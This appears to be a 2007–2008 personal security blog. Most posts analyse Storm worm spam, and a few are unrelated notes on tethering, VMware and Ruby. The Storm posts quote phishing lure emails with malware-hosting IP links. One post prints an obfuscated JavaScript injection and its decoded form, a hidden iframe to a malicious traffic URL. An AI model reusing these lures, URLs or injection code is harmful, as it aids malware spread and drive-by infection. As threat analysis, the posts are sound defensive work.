Tuesday, January 15, 2008

Storm <3's You!

Storm (Nuwar, CME711, etc) just reminded me that Valentine's is less than a month away. I've gotten four recycled e-mails looking to spread some love. When I first got the copies, only two AV vendors (NOD32v2 & Webwasher-Gateway) on VirusTotal.com were detecting it as malicious.

Subject: Our Love is Free
Body: When Love Comes Knocking http://69.212.48.3/

Subject: I Love Thee
Body: Words in my Heart http://24.1.116.187/

Subject: A Is For Attitude
Body: A Dream is a Wish http://222.107.37.211/

Subject: Eternity of Your Love
Body: The Moon & Stars http://68.57.210.178/

The webpage contains some URL-encoded text that links to "with_love.exe".

'%3C%61%20%68%72%65%66%3D%22%77%69%74%68%6C%6F%76%65%2E%65%78%65%22%3E%0D%0A'

Sunday, November 04, 2007

Tethering a Verizon BlackBerry 8830 with Mac OS X Leopard

These settings go into System Preferences under the Network area. You have to add a Bluetooth device and pair the phone as a modem. If you don't know how, read the forum post that got me this far. The forum post's steps work great with Tiger but did not work with Leopard. I had to make changes to the Advanced area to get it to work properly.

Username: PHONE_NUMBER@vzw3.com (not sure how important this is, I've done it with the BlackBerry Internet Server username also)
Password: vzw
Telephone: #777

Advanced button
Vendor: Generic
Model: Dialup Device
(Leave the rest as defaults)

Friday, November 02, 2007

Ruby snippet for URI decoding

Ruby Module URI::Escape

I was doing some quick analysis of a page that had some obfuscated JavaScript with some URI-encoded text. Usually, I pull out the JavaScript and run it through SpiderMonkey (or Didier Stevens' modified version) to see what's going on. Recently, Jordan and I were talking about CLI tools for doing encoding/decoding of things in hex, URI, binary and similar.

So, I took this opportunity to figure out the Ruby for deobfuscating something like this:
eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e
%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66
%72%61%6d%65%20%6e%61%6d%65%3d%39%61%37%62%34%37%32%32%20%73%72%63
%3d%5c%27%68%74%74%70%3a%2f%2f%69%6c%6f%76%65%6d%79%6c%6f%76%65%73
%2e%63%6f%6d%2f%74%72%61%66%66%2e%70%68%70%3f%27%2b%4d%61%74%68%2e
%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%31%35
%32%37%36%29%2b%27%37%61%33%62%36%38%30%39%66%38%5c%27%20%77%69%64
%74%68%3d%32%30%31%20%68%65%69%67%68%74%3d%37%36%20%73%74%79%6c%65
%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69
%66%72%61%6d%65%3e%27%29"));

Which this:
ruby -e 'require "uri"; p URI.unescape("<junk_from_above>")'

Returns this:
"window.status='Done';document.write('<iframe name=9a7b4722 src=\\'http://ilovemyloves.com/traff.php?'+Math.round(Math.random()*15276)+'7a3b6809f8\\' width=201 height=76 style=\\'display: none\\'></iframe>')"

Wednesday, October 24, 2007

VMware Server 1.0.4 on Ubuntu Server 7.10 (Gutsy Gibbon)

Note to self:
sudo apt-get install libxrender1 libxt6 libxtst6 libx11-6 build-essential xinetd linux-headers-2.6.22-14-server

I've heard VMware is available from one of the repositories, but I've not tried it. This is for installs from the downloaded tarball.

Thursday, October 18, 2007

Play that funky mus...stock spam, Storm

Storm has been sending out pump and dump spam for quite a while with everything from plain text to images to zips. Now, it's throwing MP3's at us. Here are two files below. So far, the subjects have been blank with "Re:" or "Fwd:".

Of note, the X-Mailer is "Microsoft Outlook Express 6.00.2800.1106" but that varies with each new iteration of storm. I've seen it claim to be Thunderbird in the past.

coolringtone.mp3
firstdance.mp3

Wednesday, October 17, 2007

Because there is no patch...

...for human stupidity. Which is why Storm keeps spreading. There is simply no excuse for people to continue infecting themselves. I'd take a stab at antivirus companies, but they simply can't keep up. Until they all move to true behavioral-based detection, they won't be able to handle the flood of malware coming from the miscreants out there.

Today, Storm worm brings us a new attempt to infect people by getting them to believe that there's a new filesharing application called Krackin. Great!

Below are samples of the e-mails, screenshots and the javascript exploits.

Subject:re: krackin is released
Body:New Sharing network goes live. Check out Krackin here.
http://xx.90.44.73/


Subject:re: krackin is online
Body:Ok, last time I am sending you this linkman. LOL write it down or
soothing. This is krackin. http://xx.74.85.128/


Subject:man here is the link
Body:man here is the next huge sharing network. It is friggin awesome. Check
it out. http://xx.37.24.109/

Here's a text file of the javascript exploit code. Handle with care!

Thursday, October 11, 2007

Kitties say Storm is better than catnip!

Just when I think there's nothing new going on with Storm, in fly a few new e-mails. This time it has similar content to before, but with the hook being a cute, crazy kitty cat.

Subject: You have just received an ecard.
Body: Check out the original Crazy Cat Card. It is too funny for words.
http://75.4.70.217/


Subject: Check out your ecard.
Body: Click here to view your laughing kitty card online. http://74.138.11.91/


Subject: You've got a greeting just for you!
Body: Please click here to view your Crazy Kitty Card Online.
http://99.162.220.182/

Here's a screenshot of the page:

After looking at the source and downloading the Flash animation (the cat), I used Flare to extract any scripts. I found that the original file came from http://www.superlaugh.com/1/catnip.swf. Both files were the same size, but the MD5s did not match.

movie 'catnip.swf' {
  // flash 4, total frames: 127, frame rate: 12 fps, 360x450 px
  frame 1 {
    ifFrameLoaded (4) {
      gotoAndPlay(3);
    }
  }
  frame 2 {
    gotoAndPlay(1);
  }
  movieClip 5 {
  }
  button 7 {
    on (release) {
      getURL('http://www.superlaugh.com', '_top');
    }
  }
  movieClip 14 {
  }
  frame 125 {
    gotoAndPlay(3);
  }
}

The links on the page all go to SuperLaugh.exe, which was caught by 70% of scan engines on VirusTotal. Obfuscated JavaScript was found at the bottom, just like in some previous versions. It looked to be the same exploits that have been used on and off since I first started looking into Storm about a month or two ago.

Also, all the images, including the kitty Flash file, were sourced from the "/img" directory, but the server did not allow directory browsing.